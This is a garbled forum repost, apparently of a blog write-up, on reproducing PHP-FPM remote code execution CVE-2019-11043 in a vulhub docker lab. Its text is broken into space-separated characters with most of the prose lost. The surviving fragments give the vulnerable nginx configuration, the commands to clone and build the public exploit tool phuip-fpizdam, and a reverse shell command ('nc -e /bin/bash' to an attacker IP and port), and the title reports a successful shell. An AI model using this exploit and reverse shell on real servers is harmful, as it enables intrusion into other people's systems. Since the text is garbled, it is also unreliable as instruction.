搜索

[26855] 2019-10-28_PHP远程代码执行漏洞复现(CVE-2019-11043)【反弹shell成功】

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-19
2019-10-28_PHP远程代码执行漏洞复现(CVE-2019-11043)【反弹shell成功】 P H P C V E - 2 0 1 9 - 1 1 0 4 3 s h e l l   M s 0 8 0 6 7   2 0 1 9 - 1 0 - 2 8 S n o w m i n g h t t p : / / b l o g . l e a n o t e . c o m / s n o w m i n g C V E - 2 0 1 9 - 1 1 0 4 3   使   N g i n x   +   P H P - F P M   N g i n x   +   P H P - F P M   U R L   % 0 a   n g i n x . c o n f 2 .   4 .   6 .   8 .   1 0 .   1 2 .   使 0 a R e g e x p R e g e x p P A T H _ I N F O   N g i n x   +   P H P - F P M     N g i n x     P H P   P H P   5 . 6   C r a s h P H P   7 . 0   P H P   7 . 1   P H P   7 . 2   P H P   7 . 3   使   p     d o c k e r   P H P - F P M   C V E - 2 0 1 9 - 1 1 0 4 3 h t t p s : / / g i t h u b . c o m / v u l h u b / v u l h u b / b l o b / m a s t e r / p h p / C V E - 2 0 1 9 - 1 1 0 4 3 / R E A D M E . z h - c n . m d   d o c k e r g o l a n g   1 .   l o c a t i o n   ~   [ ^ / ] . p h p ( / | $ )   { 3 .     . . . 5 .     f a s t c g i _ s p l i t _ p a t h _ i n f o   ^ ( . + ? . p h p ) ( / . * ) $ ; 7 .     f a s t c g i _ p a r a m   P A T H _ I N F O   $ f a s t c g i _ p a t h _ i n f o ; 9 .     f a s t c g i _ p a s s       p h p : 9 0 0 0 ; 1 1 .     . . . 1 3 .   } f a s t c g i _ s p l i t _ p a t h _ i n f o 1 .   s u d o   a p t - g e t   i n s t a l l   d o c k e r   d o c k e r - c o m p o s e 2 .   s u d o   a p t   i n s t a l l   g o l a n g 1 .   g i t   c l o n e   h t t p s : / / g i t h u b . c o m / v u l h u b / v u l h u b . g i t 2 .   c d   v u l h u b / p h p / C V E - 2 0 1 9 - 1 1 0 4 3   & &   d o c k e r - c o m p o s e   u p   - d
  h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 8 0 / i n d e x . p h p 1 .   g i t   c l o n e   h t t p s : / / g i t h u b . c o m / n e e x / p h u i p - f p i z d a m . g i t 2 .   c d   p h u i p - f p i z d a m 3 .   g o   g e t   - v   & &   g o   b u i l d

u r l   p   P H P - F P M   s h e l l : P   n c     n c     s h e l l
d o c e r   n c p   d o c k e r   n g i n x   p h p :   n g i n x  

u r l   n c   p   d o c k e r   n g i n x   d o c k e r   p h p n c   n c e x i t
  n c     s h e l l :   s h e l l   1 .   n c   - e   / b i n / b a s h   1 0 . x . x . 3 9   7 7 7 7
U R L h t t p s : / / c r . c o n s o l e . a l i y u n . c o m / c n - h a n g z h o u / i n s t a n c e s / m i r r o r s   d o c k e r  
  r e s t a r t     d o c k e r [ 1 ]   - [ 2 ]       d o c k e r   仿   d o c k e r   h t t p     s o c k s 5   p r o x y c h a i n s 1 .   s u d o   s y s t e m c t l   d a e m o n - r e l o a d 2 .   s u d o   s y s t e m c t l   r e s t a r t   d o c k e r 1 .   e x p o r t   h t t p _ p r o x y = " h t t p : / / : @ i p : / " 2 .   e x p o r t   h t t p s _ p r o x y = " h t t p : / / : @ i p : / " 1 .   e x p o r t   h t t p _ p r o x y = " h t t p : / / i p : / " 2 .   e x p o r t   h t t p s _ p r o x y = " h t t p : / / i p : / " e t c / p r o f i l e
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理